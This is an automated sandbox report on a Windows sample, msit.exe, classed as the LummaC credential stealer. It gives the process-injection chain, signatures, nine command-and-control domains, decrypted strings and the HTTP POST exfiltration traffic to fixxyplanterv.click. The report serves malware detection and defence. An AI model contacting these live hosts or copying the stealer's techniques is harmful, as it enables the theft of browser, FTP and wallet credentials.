Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
msit.exe

Overview

General Information

Sample name:msit.exe
Analysis ID:1589843
MD5:bb0ca87d28e7c1bfd53e3e592e75e684
SHA1:23be4528fe7dd78243845a6a08a88ce68200d59a
SHA256:d34e7af4d266688eb65118de606ffbeb36d46d488c3be604a5cb240778550cea
Tags:exeghd78sgithubuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • msit.exe (PID: 4472 cmdline: "C:\Users\user\Desktop\msit.exe" MD5: BB0CA87D28E7C1BFD53E3E592E75E684)
    • msiexec.exe (PID: 5320 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 " MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 4052 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5424 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2456 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIA455.tmp (PID: 6188 cmdline: "C:\Windows\Installer\MSIA455.tmp" MD5: 4D82074854750FDBA89D76624CC1E6F6)
      • dxdiag.exe (PID: 1984 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
{"C2 url": ["se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "fixxyplanterv.click", "zinc-sneark.biz", "formy-spill.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "ZqchOa--new"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: dxdiag.exe PID: 1984JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: dxdiag.exe PID: 1984JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: dxdiag.exe PID: 1984JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:34:40.217641+010020283713Unknown Traffic192.168.2.849707104.21.6.116443TCP
              2025-01-13T08:34:41.565036+010020283713Unknown Traffic192.168.2.849708104.21.6.116443TCP
              2025-01-13T08:34:42.738566+010020283713Unknown Traffic192.168.2.849709104.21.6.116443TCP
              2025-01-13T08:34:43.734959+010020283713Unknown Traffic192.168.2.849710104.21.6.116443TCP
              2025-01-13T08:34:44.942967+010020283713Unknown Traffic192.168.2.849711104.21.6.116443TCP
              2025-01-13T08:34:47.431490+010020283713Unknown Traffic192.168.2.849712104.21.6.116443TCP
              2025-01-13T08:34:48.815217+010020283713Unknown Traffic192.168.2.849715104.21.6.116443TCP
              2025-01-13T08:34:50.929730+010020283713Unknown Traffic192.168.2.849719104.21.6.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:34:40.897301+010020546531A Network Trojan was detected192.168.2.849707104.21.6.116443TCP
              2025-01-13T08:34:42.043887+010020546531A Network Trojan was detected192.168.2.849708104.21.6.116443TCP
              2025-01-13T08:34:51.433133+010020546531A Network Trojan was detected192.168.2.849719104.21.6.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:34:40.897301+010020498361A Network Trojan was detected192.168.2.849707104.21.6.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:34:42.043887+010020498121A Network Trojan was detected192.168.2.849708104.21.6.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:34:44.283700+010020480941Malware Command and Control Activity Detected192.168.2.849710104.21.6.116443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "fixxyplanterv.click", "zinc-sneark.biz", "formy-spill.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "ZqchOa--new"}
              Source: C:\Windows\Installer\MSIA455.tmpReversingLabs: Detection: 63%
              Source: msit.exeVirustotal: Detection: 9%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
              Source: C:\Windows\Installer\MSIA455.tmpJoe Sandbox ML: detected
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: impend-differ.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: print-vexer.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: dare-curbys.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: covery-mover.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: formy-spill.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: se-blurry.biz
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: fixxyplanterv.click
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmpString decryptor: ZqchOa--new
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00415971 CryptUnprotectData,7_2_00415971
              Source: msit.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49719 version: TLS 1.2
              Source: msit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: wininet.pdb source: shi95F5.tmp.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: msit.msi.0.dr
              Source: Binary string: ucrtbase.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: MSIA2EC.tmp.2.dr, MSI986D.tmp.0.dr, MSI97FE.tmp.0.dr, MSI982E.tmp.0.dr, msit.msi.0.dr
              Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: MSIA28C.tmp.2.dr, msit.msi.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: MSIA28C.tmp.2.dr, msit.msi.0.dr
              Source: Binary string: wininet.pdbUGP source: shi95F5.tmp.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msit.msi.0.dr
              Source: Binary string: ucrtbase.pdbUGP source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSIA20D.tmp.2.dr, MSI9720.tmp.0.dr, msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: msit.exe
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: msit.msi.0.dr
              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\Jump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 152A0A64h7_2_0040D866
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h7_2_0043C8F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, ebx7_2_00415971
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh7_2_0043CA10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [eax], dl7_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edi, dword ptr [esi+10h]7_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [eax], dl7_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-5Ch]7_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 299A4ECDh7_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]7_2_0040CDD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_00438640
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [ebp+edi-14B5D619h]7_2_004227B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B12AB835h7_2_0041805C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edi], bl7_2_00409070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_00425800
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_0041C802
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_00425820
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 71D94D17h7_2_004180EC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+76h]7_2_004238F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 403020B8h7_2_0040D136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, byte ptr [edx]7_2_004029C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 9CAC4597h7_2_0040D9D6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]7_2_0042A9D5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [esi], cx7_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, word ptr [eax]7_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_0041A9B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [edx], bp7_2_0041CA48
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp ecx7_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov esi, edx7_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]7_2_0042AAC6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]7_2_0042AAD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then lea edx, dword ptr [edx+edx*4]7_2_004082F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 67F3D776h7_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]7_2_00426282
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]7_2_0041DA80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]7_2_0042AA8A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00432AA0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]7_2_004022B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp eax7_2_0041BB20
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [ebx+esi], 0000h7_2_0041C330
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+65184CD6h]7_2_00436BE4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]7_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]7_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]7_2_004264F2
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]7_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h7_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, word ptr [eax]7_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp ecx7_2_0040A4FC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, di7_2_0042456F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, byte ptr [eax]7_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [ecx]7_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h7_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h7_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 1F1F7B79h7_2_00417D74
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-00000095h]7_2_0042A58E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_00428DB0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+40h]7_2_0041AEC5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_0040DEE9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp eax7_2_0043B6F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, edx7_2_0041676A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edi], al7_2_00416F7C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h7_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-4D5F809Ah]7_2_0043A71E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx7_2_00409730
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-35CC155Bh]7_2_0041AFD8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, di7_2_0042456F

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49719 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49710 -> 104.21.6.116:443
              Source: Malware configuration extractorURLs: se-blurry.biz
              Source: Malware configuration extractorURLs: impend-differ.biz
              Source: Malware configuration extractorURLs: covery-mover.biz
              Source: Malware configuration extractorURLs: dwell-exclaim.biz
              Source: Malware configuration extractorURLs: fixxyplanterv.click
              Source: Malware configuration extractorURLs: zinc-sneark.biz
              Source: Malware configuration extractorURLs: formy-spill.biz
              Source: Malware configuration extractorURLs: dare-curbys.biz
              Source: Malware configuration extractorURLs: print-vexer.biz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 104.21.6.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.6.116:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TP4A0GOX3LS9EZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12820Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HS01DAG7DF0SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15037Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AY3AN2ECC6589AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20216Host: fixxyplanterv.click
